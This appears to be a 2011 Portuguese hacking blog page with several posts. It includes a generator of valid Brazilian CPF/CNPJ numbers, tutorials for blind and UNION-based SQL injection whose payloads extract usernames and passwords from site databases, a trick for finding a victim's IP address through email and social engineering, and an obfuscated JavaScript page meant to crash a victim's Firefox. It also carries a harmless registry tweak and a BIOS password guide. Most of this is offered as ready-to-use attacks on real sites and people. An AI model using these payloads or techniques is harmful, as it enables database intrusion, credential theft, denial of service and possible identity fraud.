sexta-feira, 25 de novembro de 2011

Ferramentas hackers


Meu sky-drive com algumas ferramentas hackers,  vale a pena conferir hahaa :D
Clique aqui

Gerador de CPF e CNPJ


Gerador de CPF . Para usar , salve o codigo como .html e depois abra-o em seu navegador , pronto . Terá um gerador de CPF e CNPJ só pra você :)

<html>
<head>
<title>Gerador de CPF 's e CNPJ 's Válidos By : WaldemarSilva</title>
<p align="center"><img src="http://img705.imageshack.us/img705/1391/indexpessoal.png" /></p>
<style type="text/css">
<!--
body { background: #101010; margin: 30px; padding: 0; border: 0; text-align: center; }
#geral { color: #ffffff; margin: auto; width: 320px; text-align: left; }
#cabecalho h1 { color: #f1f1f1; font: 140% trebuchet ms, sans-serif; text-align: center; }
#resultado { text-align: center; }
#resultado input { color: #000000; font: 110% trebuchet ms; text-align: center; margin: 10px; border: 3px #c0c0c0 solid; width: 200px; }
#pontuacao { font: 80% trebuchet ms; margin-bottom: 10px; }
#cpfcnpj { font: 80% trebuchet ms; margin-bottom: 10px; }
#botao { text-align: center; }
#botao input { font: 80% trebuchet ms; margin-bottom: 10px; width: 200px; }
#rodape { background: #666666; font: 60% helvetica, verdana, sans-serif; text-align: center; padding: 10px; }
#rodape a { color: #010101; }
#rodape p { color: #010101; margin: 0; }
-->
</style>
<script type="text/javascript">
var comPontos;
function randomiza(n) {
var ranNum = Math.round(Math.random()*n);
return ranNum;
}
function mod(dividendo,divisor) {
return Math.round(dividendo - (Math.floor(dividendo/divisor)*divisor));
}
function cpf() {
var n = 9;
var n1 = randomiza(n);
var n2 = randomiza(n);
var n3 = randomiza(n);
var n4 = randomiza(n);
var n5 = randomiza(n);
var n6 = randomiza(n);
var n7 = randomiza(n);
var n8 = randomiza(n);
var n9 = randomiza(n);
var d1 = n9*2+n8*3+n7*4+n6*5+n5*6+n4*7+n3*8+n2*9+n1*10;
d1 = 11 - ( mod(d1,11) );
if (d1>=10) d1 = 0;
var d2 = d1*2+n9*3+n8*4+n7*5+n6*6+n5*7+n4*8+n3*9+n2*10+n1*11;
d2 = 11 - ( mod(d2,11) );
if (d2>=10) d2 = 0;
retorno = '';
if (comPontos) retorno = ''+n1+n2+n3+'.'+n4+n5+n6+'.'+n7+n8+n9+'-'+d1+d2;
else retorno = ''+n1+n2+n3+n4+n5+n6+n7+n8+n9+d1+d2;
return retorno;
}
function cnpj() {
var n = 9;
var n1 = randomiza(n);
var n2 = randomiza(n);
var n3 = randomiza(n);
var n4 = randomiza(n);
var n5 = randomiza(n);
var n6 = randomiza(n);
var n7 = randomiza(n);
var n8 = randomiza(n);
var n9 = 0; //randomiza(n);
var n10 = 0; //randomiza(n);
var n11 = 0; //randomiza(n);
var n12 = 1; //randomiza(n);
var d1 = n12*2+n11*3+n10*4+n9*5+n8*6+n7*7+n6*8+n5*9+n4*2+n3*3+n2*4+n1*5;
d1 = 11 - ( mod(d1,11) );
if (d1>=10) d1 = 0;
var d2 = d1*2+n12*3+n11*4+n10*5+n9*6+n8*7+n7*8+n6*9+n5*2+n4*3+n3*4+n2*5+n1*6;
d2 = 11 - ( mod(d2,11) );
if (d2>=10) d2 = 0;
retorno = '';
if (comPontos) retorno = ''+n1+n2+'.'+n3+n4+n5+'.'+n6+n7+n8+'/'+n9+n10+n11+n12+'-'+d1+d2;
else retorno = ''+n1+n2+n3+n4+n5+n6+n7+n8+n9+n10+n11+n12+d1+d2;
return retorno;
}
function faz() {
if (document.form1.tipo[0].checked)document.form1.numero.value = cpf();
else document.form1.numero.value = cnpj();
}
function pontuacao() {
if (document.form1.cbPontos.checked)
comPontos = true;
else
comPontos = false;
}
</script></head>
<body onload="pontuacao()">
<div id="geral">
<div id="cabecalho">
<h1>Gerador de CPF 's e CNPJ 's Válidos By WaldemarSilva</h1>
</div>
<div id="conteudo">
<form name="form1" method="post" action="">
<div id="resultado">
<input name="numero" id="numero" readonly="readonly" size="20" type="text">
</div>
<div id="pontuacao">
<input id="cbPontos" name="cbPontos" value="1" checked="checked" onclick="pontuacao()" type="checkbox">
Pontuação
</div>
<div id="cpfcnpj">
<input id="rd_cpf" name="tipo" value="cpf" checked="checked" type="radio">
<label for="rd_cpf">CPF</label><br>
<input id="rd_cnpj" name="tipo" value="cnpj" type="radio">
<label for="rd_cnpj">CNPJ</label>
</div>
<div id="botao">
<input name="Button" value="Gerar" onclick="faz()" type="button">
</div>
</form></div>
</div>
</body>
</html>

Aumentando a Velocidade do Download


Vá em :
Iniciar > executar > digite "regedit" (sem aspas)
Vai abrir o editor de registros.
Ai você abre a chave :
HKEY_CURRENT_USER > Software > Microsoft > Windows > CurrentVersion >InternetSettings
Depois clique em adicionar valor, adicione os valores dword seguintes:
MaxConnectionsPer1_0Server=Dword:0000000a
MaxConnectionsPerServer=Dword:0000000a

Blind Sql Injection


Acredito que informaçao deve ser compartilhada
Quem tem gosto há de a entender =)
Olás a todos neste tutorial irei explicar do que se trata Sql Injection -- Blind
Porque acontece o erro e como explora.lo

Aviso: Vao precisar de tempo

Requesitos Noção basica de Sql

Começando...

Podemos observar abaixo o seguinte codigo vulneravel:

Código:
// Verifica a id do login
$id = " ";
$query = " SELECT * FROM usuarios WHERE login = $id ";
echo "Normal: " . $query . "<br />";

O que se esta a passar acima?
Bem.. basicamente temos um script escrito em php onde estamos a recorrer ao mysql. Na variavel $query estamos a seleccionar todas as colunas da tabela usuarios onde a coluna login tem o valor $id que e inserida pela pessoa que esta a navegar.

O comando echo faz com que retorne na pagina todas as colunas dessa tabela se a sintase for verdadeira e estiver correcta.

-----------------------------------------------

Exemplo de exploraçao da vulnerabilidade

Código:
// Verifica a id do login
$id = "1 AND 1=1 ";
Sendo assim na nossa base de dados ficaria:

Código:
// Verifica a id do login
$query = " SELECT * FROM usuarios WHERE login = 1 AND 1=1 ";
echo "Normal: " . $query . "<br />";
Bem como isto e um tutorial de blind vamos passar qo que interessa...

Como a afirmaçao acima contida em $id e verdadeira e nao apresenta erros de sintase a pagina vai abrir normal e retornar todas as colunas do usuario cuja $id = 1

-----

Agora vamos testar:

Código:
$id = " 1 AND 1=0 "
Ficando:

Código:
// Verifica a id do login
$query = " SELECT * FROM usuarios WHERE login = 1 AND 1=0 ";
echo "Normal: " . $query . "<br />";
Acima podemos verificar que a sintase nao tem erros porem 1 != (e diferente) 0 logo esta afirmaçao nao e verdadeira o que nos irá retornar a pagina, porém sem conteudo

É precisamente aqui que nos vamos servir da vulnerabilidade
Lembrando que o nome Blind Sql injection deriva disto
Estamos a injectar codigos onde o site nao nos retorna erros baseamo.nos em verdadeiros e falsos (lembrando que existem outros metodos com wait for delay e etc que nao irei abordar ainda neste tutorial)

----------

Passando a acçao:

Agora poderemos nos servir de algumas funçoes do mysql para explorar a falha, por exemplo...

[Ja devem ter ficado com uma noçao...a partir daqui vou postar menos vezes o script todo e resumir.me a injection]

Exemplo:

Código:
1 AND substring(@@version,1,1)=5
O que significa?
Basicamente estamos a recorrer a funçao substring do mysql.
O que e uma string?
String e uma cadeia de caracteres.
O que faz a substring() ?
A funçao substring() adiciona valores (string) dentro dela. Nos poderemos aproveitar esta funçao para verificar caracter a caracter cada letra desse mesmo valor...

Simplificando...

No codigo acima estamos a adicionar @@version e verificar o seu primeiro caracter em ,1,1 neste caso...verificamos se e igual a 5

Suponhamos que a versao e a 5.0.27 entao p primeiro caracter desta string e =5 Sendo assim a afirmaçao injectada verdadeira. Logo o conteudo do site irá aparecer.

Se testarmos com

Código:
1 AND substring(@@version,1,1)=4
O conteudo nao ira aparecer porque apesar da sintase ser correcta, e falsa, logo nao vai retornar nada no site.

Espero que tenham percebido...

O que nos interessa saber?
O nome da base de dados, das colunas e das tabelas
Normalmente o nome da base de dados nem verificamos em blind
Por isso vou so verificar as tabelas e colunas visto que o processo e o mesmo

Explorando...

Código:
1 AND (select 1)=1
O site retorna.nos verdadeiro and =2 obvio que nao retorna nada

-----------------

Adivinhaçao de tabelas:

Código:
1 AND (select 1 from nome_da_tabela)=1
Vamos testando varios nomes ate acertar ...
Neste caso para nos dar um resultado verdadeiro no retorno da pagina teria que ser :

Código:
1 AND (select 1 from usuarios)=1
Usamos o mesmo procedimento para listarmos as colunas:

Código:
1 AND (select nome_da_coluna from usuarios)=1
Para obtermos retorno verdadeiro neste caso especifica seria:

Código:
1 AND (select login from usuarios)=1
E o site apareceria com o conteudo do usuario cuja $id = 1
(ja se tinham esquecido do script nao? )

Porem nao nos retorna o valor da coluna login
Lógico que nao. Como isto e um tutorial de blind nao me interessa explicar a exploraçao de mudar a $id para negativa e juntar as colunas todas com union.

---------------------------

Vamos agora descubrir qual o valor que esta contido na coluna login
Para isso vamos usar outra funçao.
A funçao ascii() e verificamos o valor de cada caracter ascii em decimal

Explorando e esplicando...

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>0
O que faz o codigo acima?
Bem basicamente temos uma string com a concatenaçao da coluna login (usei o comando concat caso queiram concatenar colunas ne? ) e vamos verificar o valor do primeiro caracter em ascii, com a funçao ascii() neste caso o site retornanos verdadeiro (a esta altura do campeonato ja devem saber o que verdadeiro e ) porque o primeiro caracter da substring() que contem o valor da coluna login no limite 0,1 é >0

Leiam bem com atençao para nao restarem duvidas

------------

Sabendo isto vamos verificar agora qual o valor exacto (em decimal) deste caracter:

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>50
Verdadeiro

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>94
Verdadeiro

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>100
Falso hummmm

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>96
Verdadeiro

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>97
Falso

Ora bem ja temos o nosso primeiro caracter do valor da coluna login
O primeiro caracter e >96 mas nao e >97 logo o nosso caracter vai ser 97
Agora so precisamos de ir a uma tabela ascii verificar o caracter correspondente ao valor 97 em ascii será ele [a]
(Boa tabela no fim do tutorial)

Feito isto vamos passar a verificaçao do 2 caracter...

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),2,1))>0
Verdadeiro -- Logo existe (ja explico)

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>96
Verdadeiro

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>105
Falso

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>99
Verdadeiro

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>100
Falso

Na tabela ascii 100 corresponde ao caracter [d]

Ja temos.. ad

Vou passar alguns caracteres a frente....

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),5,1))>96
Verdadeiro

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>105
Verdadeiro

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>110
Falso

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>108
Verdadeiro

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>109
Verdadeiro

Perceberam? o caracter e >109 mas nao e >110 logo o 5º caracter e [n]

Agora nos temos ad**n

Como podem calcular se fizessemos os outros caracteres o valor da coluna login sera admin

Mas......

Vamos testar se nao a mais caracteres para a frente

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),6,1))>0
Falso

O que significa?

Significa que o 6º Caractere nao e >0 logo nao existe

Passemos agora ao proximo usuario...

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 1,1),1,1))>0
Verdadeiro

Basta apenas ir mudar o limit para o a seguir e ir usando a mesma tecnica

Acham cansativo?
Esperem ate ler o proximo...

-------------------------------------------

Descobrir nome de tabelas e colunas de modo infalivel

Bem na tecnica acima tentamos adivinhar o nome da tabela e da coluna -- tivemos sorte...mas e quando o nome nao e assim tao facil de adivinhar?

Foi aqui que pus o cerebro a trabalhar...bem..facil

Vejamos:

Código:
1 AND ascii(substring((select concat(table_name) from information_schema.tables limit 0,1),1,1))>0
Verdadeiro

Nao tem nada que saber pessoal...agora e usar o mesmo metodo para descubrir o nome da tabela

Ja sabemos que a primeira letra....

Código:
1 AND ascii(substring((select concat(table_name) from information_schema.tables limit 0,1),1,1))>66
Verdadeiro

Código:
1 AND ascii(substring((select concat(table_name) from information_schema.tables limit 0,1),1,1))>67
Falso
o 1º caracter seria C

Podemos ate deduzir que o resto do nome seria CHARACTER_SETS


Onde esta o truque?

O truque agora esta em tentar ser objectivo...
Por exemplo...vamos logo tentar descubrir a tabela onde a primeira letra seja um [a] de admin se nao houver... um [l] de login .. [m] de membros , [u] de usuarios...isso agora fica ao vosso criterio...

Neste tutorial especifico o nome da tabela e usuarios logo vou usar este

Primeiro vemos quantas tabelas tem a base de dados... usando o limit

Código:
1 AND ascii(substring((select concat(table_name) from information_schema.tables limit 100,1),1,1))>0
Verdadeiro

Código:
1 AND ascii(substring((select concat(table_name) from information_schema.tables limit 101,1),1,1))>66
Falso

Vemos que tem 101 tabelas...
Agora vemos qual a tabela que começa pela letra [u]

Código:
1 AND ascii(substring((select concat(table_name) from information_schema.tables limit 101,1),1,1))>117
Verdadeiro

Código:
1 AND ascii(substring((select concat(table_name) from information_schema.tables limit 50,1),1,1))>117
Verdadeiro

Código:
1 AND ascii(substring((select concat(table_name) from information_schema.tables limit 49,1),1,1))>117
Falso

Código:
1 AND ascii(substring((select concat(table_name) from information_schema.tables limit 49,1),1,1))>116
Verdadeiro

Logo a primeira letra da tabela [49] e [u]
Usamos a mesma tecnica para descubrir o resto do nome...que neste caso seria usuarios...


Descubrindo as colunas...

Código:
1 AND ascii(substring((select concat(columns_name) from information_schema.columns where table_name='nome da coluna' limit 0,1),1,1))>0
Verdadeiro

A tecnica usada seria a mesma tanto para os caracteres como para o posicionamente da coluna na base de dados..e so ser esperto


Quando tivermos o nome das tabelas e colunas e so concatenar o resultado como ja explicado acima



-----------------------------------

Barreiras impostas pelos admins:

Bem, existem maneiras de os admins tentarem dificultar a tarefa...
Uma delas...

Código:
// Verifica a id do login
$id = " ";
$query = " SELECT * FROM usuarios WHERE login = '$id' ";
echo "Normal: " . $query . "<br />";
Bem facil de passar basta obter uma sintase correcta...
Neste caso

Código:
1 AND 1=1
Falso -- O site nao diz mas e erro de sintase
Código:
1' AND '1'='1
Verdadeiro



Vamos verificar

Código:
$query = " SELECT * FROM usuarios WHERE login = '1' AND '1'='1' ";
A partir daqui e usar o mesmo metodo para dar a volta a sintase

Código:
1' AND substring(@@version,1,1)='4
Código:
1' AND (select nome_da_coluna from usuarios)='1
Código:
1' AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>'0
Código:
1' AND ascii(substring((select concat(columns_name) from information_schema.columns where table_name='nome da coluna' limit 0,1),1,1))>'0
Só arranjar maneira de obter uma sintase correcta

--------------------

Agora...quando as magic quotes estao ligadas
Uma das opçoes ainda bastante usada pelos admins para travar lammers de invadirem o seu site e o uso das magic quotes. Em que consiste este processo?

O administrador utiliza a funçao mysql_real_escape_string()
Vejam abaixo:

Código:
// Verifica a id do login
$id = mysql_real_escape_string($id);
$query = " SELECT * FROM usuarios WHERE login = '$id' ";
echo "Normal: " . $query . "<br />";
O que faz essa funçao?
Ela vai substituir as quotes(') por \'

Assim ficando a nossa injection...

Código:
1\' AND \'1\'=\'1
Falso

O site nao retornaria o os valores das colunas.

Bem a verdade e que se as magic quotes estiverem ligadas com blind sql injection nao conseguimos explorar..so com advanced :/

Se o site so estiver vulneravel a blind..podem esquecer xD

------------------------

Boa protecçao usada pelos admins abaixo

Código:
// Verifica a id do login
$id = (int)$_GET['id'];
$query = " SELECT * FROM usuarios WHERE login = '$id' ";
echo "Normal: " . $query . "<br />";
Assim a pagina so vai retornar os valores se id for inteiro
- esta vai greetz po ravnos -

-------------------------------

Ora espero que tenham gostado e percebido
Deu bastante trabalho a escrever...
Por isso façam o favor de meter os creditos onde quer que seja que postem este tutorial

Creditos: Lenamote™

Como pegar o IP da vítima por email

É um tutorial pequeno, mas eficiente.
Primeiro de tudo.
Entre na sua conta do hotmail.
Peça para a vítima mandar um email pra voce. Sei lá , Faz uma boa engenharia social, e ja eras.
Quando ela mandar o email, fique atento, pois o ip pode muda quando ela se conectar novamente.
Bom, continuando. Clique no email e clique no botao direito do mause e bote em codigo fonte,
De um ctrl + f e procure por 
X-Originating-IP:xxx.xxx.xxx.xxx"
Pronto, voce achará o IP da vitima.

Tutorial + Video-Aula: Mysql Injection com Information_schema.


1 – O que é Information_Schema? 

In relational databases, the information schema is an ANSI standard set of read-only views which provide information about all of the tables, views, columns, and procedures in a database. It can be used as a source of the info rmation which some databases make available through non-standard commands, such as the SHOW command of MySQL, the DESCRIBE command of Oracle, and the \d command of PostgreSQL.
Retirado de Wikipédia.
Basicamente foi criado para listar tables,views e colunas, mas quando cai em mãos erradas pode revelar praticamente tudo do seu BD para um black hat.
Maldito Information!!   Não amigo, o information foi criado para o bem, a vulnerabilidade não está nele ou no mysql, está no seu site que faz com que ele possa ser executado remotamente.

2 – Vulnerabilidade: Como ocorre? Como saber? Como resolver? 

A vulnerabilidade se dá por SQL Injection, Aqui no site ja falamos inúmeras vezes como ela ocorre e como resolver, sugiro a você dar uma pesquisada.
Como saber se posso usar information_schema?  Esse recurso está presente no Mysql 5+ para ver isso basta usar na query @@version, exemplo:
www.site.com/index.php?noticia=173+union+all+select+1,@@version ,3 
e for exibido algo como:
5.0.51a-3ubuntu5.8 
Você pode usar information, é claro que pode aparecer outras versões, isso é apenas um exemplo, mas de 5 em diante você pode usar.

3 – Explorando 

A exploração é bem simples, e faremos consultas nessa ordem:
1 – Tabela
2 – Coluna
3 – Dados da Coluna
Achando a Tabela

Digamos que você ja deu Union all select e aparecem no site os numeros 5,6,7. 
Deu a seguinte query:
http://www.site.com/index.php?noticia=173+union+all+select+1,2,3,4,5,6 ,7,8,9,10,11 
Agora fazemos a procura em information_schema.tables:
http://www.site.com/index.php?noticia=173+union+all+select+1,2,3,4,5,6 ,7,8,9,10,11 from information_schema.tables
Substituimos a parte que aparece no site por table_name:
http://www.site.com/index.php?noticia=173+union+all+select+1,2,3,4,tab le_name,6,7,8,9,10,11 from information_schema.tables
O resultado será uma lista de tabelas, ex:
tabela
7
6
tabela2
7
6
tabela3
7
6
usuarios
7
6
 Pronto já temos as tabelas, agora procure alguma que interesse, como ex: usuarios ou admin e iremos limitar a consulta com where table_name=’nome da tabela’ ou então nem limitar e exibir as colunas de cada tabela, como fiz na video-aula.


Limitando:


http://www.site.com/index.php?noticia=173+union+all+select 1,2,3,4,column_name,6,7,8,9,10,11 from information_schema.columns where table_name='usuarios'

Resultado ser algo como:


coluna
7
6
coluna2
7
6
senha
7
6
usuario
7
6
Não limitando:

http://www.site.com/index.php?noticia=173+union+all+select 1,2,3,4,table_name,column_name,7,8,9,10,11 from information_schema.columns
Resultado:
tabela

7
6
tabela2
7
6
tabela3
7
6
usuarios
7
coluna
usuarios
7
coluna2
usuarios
7
senha
usuarios
7
usuario

Pronto agora temos Tabela: usuarios, Colunas: coluna,coluna2,usuario,senha.
Só falta pegar os dados dela:
http://www.site.com/index.php?noticia=173+union+all+select 1,2,3,4,usuario,senha,7,8,9,10,11 from usuarios
Conseguimos !

4 - Vídeo 


(recomendamos você ver em 720p Tela Cheia)


Como proteger seu computador com uma senha antes mesmo dele carregar o sistema operacional


Como proteger seu computador com uma senha antes mesmo dele carregar o sistema operacional
Nível: Avançado
Número de passos: 7
Assim que você aperta o botão de energia do seu computador, o seu monitor é ligado e começa a apresentar a Bios na sua tela, conferindo a presença e o funcionamento das placas, da memória, dos discos rígidos e dos periféricos conectados à placa-mãe, antes de dar início ao seu sistema operacional, seja ele Windows, Linux, iOS, ou qualquer outro.
A Bios é responsável por dizer que o seu computador é, de fato, um computador, e todos esses comandos para fazer o sistema funcionar em conjunto são armazenados seguramente em um chip na sua placa mãe, independentemente do que mais estiver conectado à ela. Agora, com tamanha responsabilidade, já imaginou se você pudesse colocar uma senha nela?
E você pode! Aprenda como configurar uma senha na BIOS e proteja totalmente o seu computador de intrusos.
Atenção!  Siga as instruções corretamente, e certifique-se de que você está mexendo nas opções certas. Qualquer modificação errada pode fazer com que o seu computador não inicialize corretamente.
Definindo uma senha no setup da Bios
Passo 1. Assim que o computador inicializar, mantenha pressionada a tecla Del até abrir o setup de configuração da Bios.
O comando para acessar o setup pode variar de acordo com a fabricante da placa-mãe, mas é possível identificá-la em alguma frase na tela inicial, geralmente no canto debaixo. Fique atento pois o tempo é bem curto para ler. Se necessário, reinicie o computador.
Passo 2. Ao abrir o setup, procure pela opção Set Password e, com as setas direcionais do teclado, selecione a opção e tecle enter (o mouse não funciona aqui). Pode haver variações do nome deste comando para inserir a senha, mas isso não será problema se você souber um pouco de inglês.
Passo 3. Digite a senha que você deseja usar. Use o backspace para corrigí-la, se necessário, e tecle enter quando terminar.
Configurando o bloqueio da inicialização do sistema
Passo 4. Entre no menu de configurações avançadas da Bios (geralmente com o nome Advanced BIOS Features). Clique em enter.
Passo 5. Procure pela opção Secure Option na lista apresentada e, uma vez selecionada, aperte enter para trocar da opção Setup para System. Novamente, vale lembrar que o comando pode variar de acordo com o fabricante. A coluna da direita, ou alguma frase na parte inferior, certamente terá uma indicação sobre o comando certo.
Passo 6. Aperte esc para voltar à tela inicial.
Passo 7. Vá em Save & Exit Setup, pressione enter e digite Y (de “Yes”) para confirmar as alterações no setup.
Uma vez configurado, toda vez que o computador inicializar o sistema, ele abrirá uma pequena caixa de texto pedindo a senha que você configurou. Apenas tome cuidado para não esquecê-la.
Creditos : http://www.invasaohacking.com

Exploit para firefox


Novo exploit pra travar o Firefox Funcionando ! Testado : 25/11/2011 

<STYLE TYPE="text/css">
<!--
H2
{
color:green;
font-size:80pt;
font-style:italic;
}
-->
</STYLE>
<script type="text/javascript">
String.prototype.repeat = function( num )
{return new Array( num + 1 ).join( this );}
var i=0;
var r=Math.floor(Math.random()*99999)*9*8*9*9*9*9*9*9* 9/9*9;
var bib=String.fromCharCode(60, 72, 50, 62, 60, 77, 65, 82, 81, 85,
69, 69, 32, 87, 73, 68, 84, 72, 61, 49, 48, 48, 37, 32, 66, 69, 72,
65, 86, 73, 79, 82, 61, 83, 67, 82, 79, 76, 76, 32, 68, 73, 82, 69,
67, 84, 73, 79, 78, 61, 82, 73, 71, 72, 84, 32, 66, 71, 67, 111, 108,
111, 114, 61, 121, 101, 108, 108, 111, 119, 62, 60, 105, 110, 112,
117, 116, 32, 116, 121, 112, 101, 61, 115, 117, 98, 109, 105, 116,
32, 118, 97, 108, 117, 101, 61)+r+String.fromCharCode(32, 115, 116
, 121, 108, 101, 61, 34, 98, 97, 99, 107, 103, 114, 111, 117, 110,
100, 45, 99, 111, 108, 111, 114, 58, 98, 108, 97, 99, 107, 34, 32,
62, 60, 47, 77, 65, 82, 81, 85, 69, 69, 62, 60, 47, 72, 50, 62);
document.write(bib.repeat(99999));
</script>

Creditos : ITsecTeam .

Como usar :
Salve esse texto como HTML , ou hospede em alguma pagina , e assim que a vítima abrir seu firefox vai travar.

Tutorial de SQL Injection


Nesse tutorial irei ensinar uma falha popularmente conhecida como SQL Injection.
Bom , vamos logo pro assunto.
Primeiro vamos pegar um site , por exemplo:
http://www.site.com/noticias/detalhes.php?id=45
Para sabermos se o site está vulneravel vamos colocar na frente do 45 uma aspa ( ' ) . Como no exemplo abaixo:
http://www.site.com/noticias/detalhes.php?id=45'
Caso retorne algum erro como por exemplo

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''20549'' and loja.codigo = estoque.codigo limit 1' at line 1

Parabéns , o site está vulneravel . Pronto agora vamos ao ataque.

Para descobrirmos quantas tabelas o site tem vamos adicionar a URL o comando ORDER BY e o numero de TABELAS , então você pode user espaço ou + , no caso vou usar + pra poder deixar mais fácil o entendimento.

http://www.site.com/noticias/detalhes.php?id=45+order+by+5
Deu certo ? OK , há cinco tabelas , ai você vai acrescentando sempre +1 , por exemplo tentei ORDER BY 1 ; Order by 2 ; order by 3 ; order by 4 ; order by 5 ; e na hora que coloquei ORDER BY 6 deu erro , é porque nao existe 6 tabelas e sim 5.

Agora vamos pra parte de seleção de colunas :
Vamos usar a syntax  UNION ALL SELECT e adicione um - atras do numero da noticia :
Por exemplo :
http://www.site.com/noticias/detalhes.php?id=-45+union+all+select+1,2,3,4,5 --
Se deu tudo certo quer dizer que está tudo bem até o momento , agora chega a parte mais dificil , achar a tabela do administrador , mais se tudo ocorrer OK , e for tabelas padrões é mais facil hahahaa :D
Segue o exemplo abaixo :

http://www.site.com/noticias/detalhes.php?id=-45+union+all+select+1,2,3,4,5+from+usuarios --
Se tudo ocorrer OK , vai aparecer a pagina e uns números, é nesses números que você vai editar, por exemplo tem o numero 2 e 4 Grande na noticia , substituindo a noticia.
Já que a tabela dos usuários já está selecionado , agora resta selecionar os dados . Por exemplo

http://www.site.com/noticias/detalhes.php?id=-45+union+all+select+1,Login,3,Senha,5+from+usuarios --
 Gostou do tutorial ? Comente :)
Tutorial feito por mim mesmo Waldemar Silva.
Duvidas ? :)